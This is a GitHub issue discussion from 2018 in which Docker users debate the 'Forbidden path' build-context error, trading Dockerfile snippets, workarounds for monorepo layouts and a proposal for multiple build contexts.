When something exists but you are not permitted access to it, it is _forbidden_. If its not a valid for some other reason, its Invalid for some other reason.

Writing Dockerfiles for your project doesn't sound "get started" to me

I started with the one that is created when adding docker support to a VS project. It would run in a debugger but that isnt very useful if I need to make a deployable image. Trying to use the CLI to build the image outside of VS just reports the temp folder error. The file looks correct ...

FROM microsoft/aspnet:4.7
ARG source
WORKDIR /inetpub/wwwroot
COPY ${source:-obj/Docker/publish} .
PS C:\WINDOWS\system32> docker build C:\Users\astanton\source\repos\WebApplication3

"Docker, build using this folder and the docker file in it." seems to be what the CLI help tells me this means. Nothing about a build context or additional paths, just the one path to direct it to, be it a filesystem path, or a URL, or a "-" (the dash must be a *nix convention). The command looks correct...
image

Both the command and the dockerfile look correct, yet it does not work.

StingyJack picture StingyJack  ·  9 Jan 2018
0

Nothing about a build context or additional paths

In Unix, --help usually means "short help". If you need extended info you should use man:
https://unix.stackexchange.com/questions/86571/command-help-vs-man-command

I don't see how this problem you have is related to "Forbidden path" issue.

Error message tells you that there's no folder named obj\Docker\publish in C:\Users\astanton\source\repos\WebApplication3\. Where do you see "Forbidden path"?

Vanuan picture Vanuan  ·  9 Jan 2018
0

I don't see how this problem you have is related to "Forbidden path" issue.
You are applying the word with an incorrect meaning. I don't mean offense, i can only speak in one language and you clearly can communicate in more than one. Personally I would rather be corrected than to continue to speak incorrectly.

if --help is the short help (that goes on for a few screens worth of console), then what is -h ?

That usage example says run the executable "docker" with command (option) "build" and give it a path. And then says "build an image from a docker file". So the path must be to the docker file, yes? If there are other params required it should say that, not make me look up "man pages".

I still dont understand why its choosing to use the temp folder and then complaining about it when I gave the path to the docker file as the parameter and that has a relative path in it.

StingyJack picture StingyJack  ·  10 Jan 2018
0
$ docker build --help
Usage:  docker build [OPTIONS] PATH | URL | -
Build an image from a Dockerfile
Options:
...
-f, --file string                Name of the Dockerfile (Default is 'PATH/Dockerfile')

PATH points to your build context, which must include all the content you want to access in your build. Default Dockerfile is in that directory, but you can override that with -f.

Your PATH needs to contain a obj/Docker/publish by the look of it.

javabrett picture javabrett  ·  10 Jan 2018
0

I still dont understand why its choosing to use the temp folder and then complaining about it when I gave the path to the docker file as the parameter and that has a relative path in it.

It doesn't have to use the temp folder, it's just an implementation detail. What really happens is that it uses a remote build. I.e. while physically it's just a different location of the same machine, logically, docker build doesn't build on your local machine, it builds on the remote machine. So you must provide all the files the build needs inside the directory or tarball specified by PATH or URL so that these files are copied to that remote machine and used to produce an image. This approach is called "the client/server architecture".

if --help is the short help (that goes on for a few screens worth of console), then what is -h ?

That is also a Unix convention: https://unix.stackexchange.com/a/6974
CLI flags that are composed of one letter are specified using a minus (-h). They usually have an expanded version that has identical meaning, but longer to type (--help). I.e. both -h and --help should produce the same output.

says "build an image from a docker file". So the path must be to the docker file, yes? If there are other params required it should say that, not make me look up "man pages".

This sounds like a valid point.
Please create a new issue if you want the docker build --help to be changed to be more descriptive.

Vanuan picture Vanuan  ·  10 Jan 2018
0

I hit this all the time with go projects, where it is common for packages to live at the root of the project, and not in the buildable command directory (where i want the Dockerfile to live).

project/ 
    pkg/
        utilities/
            utils.go
    cmd/
        binary-name/
            main.go
            Dockerfile

I can't build the Dockerfile and use the newest version of the utilities dir if I build from the binary-name directory.

I could of course run go get in my Dockerfile, but often times I want to use the local (modified) versions of my packages that are not yet published upstream.

Here are the workarounds I've come up with (some seen in this issue):

Move Dockerfiles to project root
Move your Dockerfile to the root of your project and re-factor it to add files and directories from the project root path onward (ADD ./pkg /go/src/github.com/integrii/project/pkg.

  • Cons: Some people have huge projects and Docker uploads the entire "context" its running in to whatever the building server is, which is sometimes a remote server over VPN. This is too slow for some people.

Make a temporary dir for outside dependencies
Create a Makefile in your binary-name directory that copies in outside dependencies to a temporary directory, then calls docker build. Refactor your Dockerfile to add files from the temporary directory created in your Makefile when building. Have the Makefile then call a clean that deletes the temporary directory.

  • Cons: Your Makefile may break, leaving garbage duplicated files around. You can make this less of an issue by adding the temporary directory to a .gitignore file.

Run Dockerfiles from root context
Run your Dockerfile from the project root "context", but let it keep living in the binary-name dir (docker build -f cmd/binary-name/Dockerfile .). Refactor the Dockerfile to add files relative the root of the project.

  • Cons: Still does not work with huge repos, that end up shipping the entire project to a remote docker server in some environments.
integrii picture integrii  ·  15 Jan 2018
4

@integrii
Read above the recommended option: do not use Dockerfile for development. Use go base image + docker-compose + mounted folders.

Vanuan picture Vanuan  ·  15 Jan 2018
0

After 153 comments I would have figured this would be understood as a basic needed feature... using asp.net, the build is based off of a directory. If you're recommending me to have separate csprojects just for a docker build, that is crazy. The official dotnet-core-architecture example shows building outside of docker, then just copying the built contents into a docker container... that can't seriously be the considered way of doing this. Our directory is almost 800mb, I'm not sending that much for each project that needs to build.

Please, just give us this basic feature.

Dispersia picture Dispersia  ·  14 Feb 2018
0

@Dispersia A lot of people confuse docker build and Dockerfile with build scripts. Dockerfile was never intended to be a general purpose build tool.

Though you can use Dockerfile this way, you're on your own with it's caveats.

Yes, if you want a production image, you should run a container to build your artifacts and then copy these build artifacts to the place where Dockerfile is located or change the context to the directory with your build artifacts.

Vanuan picture Vanuan  ·  14 Feb 2018
0

See it this way: Dockerfile is a set of instructions to copy your _runtime_ files to an empty docker image.

Vanuan picture Vanuan  ·  14 Feb 2018
0

@Vanuan that's the point of multi-stage builds, correct? If project B references project A, project B won't build, because it expects a csproj reference to to the project, not to a dll reference, even if you get the artifacts of project A, unless you make a separate csproj to reference by compiled dll instead of source, it won't build. And ya, I am confused what you mean "docker build vs dockerfile with build scripts". Docker build is for Dockerfile, correct? If not, I don't feel that should be the description on the top of the Docker Build page :P

Dispersia picture Dispersia  ·  14 Feb 2018
0

So you're saying you're using csproj files to build multiple projects simultaneously? In this case you need to access all the source files, which is 800 mb in your case. I don't see what you expect. You either build them inside or outside a container. In either case you'll end up with dll and exe files which you then put into an image

Vanuan picture Vanuan  ·  14 Feb 2018
0

Structure:

  • Libraries
    --- Library 1
    --- Library 2
    --- Library 3
  • APIs
    --- API 1 - reference library 1
    --- API 2 - references library 2 and library 3

If I request API 1to be built, i do NOT need to send library 2, library 3, and API2. I ONLY need Library 1 and API 1.

This is a C# project reference:
< ProjectReference Include="..\..\..\BuildingBlocks\EventBus\EventBusRabbitMQ\EventBusRabbitMQ.csproj" />

Your Options:

A. Change Project Reference's to local dll's, destroying all intellisense for every library

B. Hot-Swap project references to specifically only build for dll as needed for each individual docker build, (hundred of hot swaps, sounds fun)

C. Send 800mb per build, when only 2 of those are actually needed

D. Don't use Docker for anything build related, one of the main reasons I want to move to docker (remove dependency on developer machine, one might use mac with .net core 1.1 installed, one might have 2.0 installed on windows, etc).

E. Fix Docker and make everyone happy.

Dispersia picture Dispersia  ·  14 Feb 2018
8

The daemon still needs to have all files sent. Some options that have been discussed;

  • Allow specifying a --ignore-file so that multiple Dockerfiles can use the same build-context, but different paths can be ignored for each Dockerfile (https://github.com/moby/moby/issues/12886)
  • The reverse: allow specifying multiple build-contexts to be sent, e.g.
docker build \
  --context lib1:/path/to/library-1 \
  --context lib2:/path/to/library-2 \
  --context api1:/path/to/api1 \
  .

Inside the Dockerfile, those paths could be accessible through (e.g.) COPY --from context:lib1

thaJeztah picture thaJeztah  ·  14 Feb 2018
0

Yes, I was going down the line of the multiple build contexts. That looks beautiful and would love that feature! Didn't see it portraid quite that way but that looks great to me at least. I could just manage my own paths

Dispersia picture Dispersia  ·  14 Feb 2018
0

@Dispersia

Don't use Docker for anything build related

I didn't say so. I said "don't use Dockefile for anything build related". You could perfectly use Docker for builds:

# docker-compose.yml
version: '3'
services:
  api1:
    image: microsoft/aspnetcore-build:2.0
    volumes:
      - ./src:/src
    work_dir: /src/api1
    command: dotnet restore; dotnet publish -c Release -o out 
  api2:
    image: microsoft/aspnetcore-build:2.0
    volumes:
      - ./src:/src
    work_dir: /src/api2
    command: dotnet restore; dotnet publish -c Release -o out 

docker-compose run api1
docker-compose run api2

Vanuan picture Vanuan  ·  14 Feb 2018
0

@thaJeztah Multiple build context sounds exactly what I am looking for! How soon can we see this feature?

rulai-huajunzeng picture rulai-huajunzeng  ·  14 Feb 2018
0

So far it has just been a possible approach that was discussed; it would need a more thorough design, and also be looked at in light of future integration with https://github.com/moby/buildkit (which has tons of improvements over the current builder, so possible has other approaches/solutions for this problem)

I can open a separate issue for the proposal for discussion; if design/feature has decided on, contributions are definitely welcome

thaJeztah picture thaJeztah  ·  14 Feb 2018
0

For .NET I resolved with a workaround...
Created a docker-compose for build and in original docker-compose generate image for production

See:
https://github.com/taigosantos/dotnet-core-poc/tree/master/docker/dotnet-docker

tfsantosbr picture tfsantosbr  ·  5 Apr 2018
0

I just encountered this issue. I have multiple multiple dockerfiles and a docker-compose housed in one repo that fires up. I've been using an nginx container to proxy my client-side code with the backend, but I am now trying to dockerize the webpack configuration so that it will copy over the code and watch for changes. I've run into this forbidden issue, since my COPY command has to reach into a sibling directory.

defields923 picture defields923  ·  11 May 2018
8

Opened https://github.com/moby/moby/issues/37129 with a proposal for multiple build-contexts

thaJeztah picture thaJeztah  ·  23 May 2018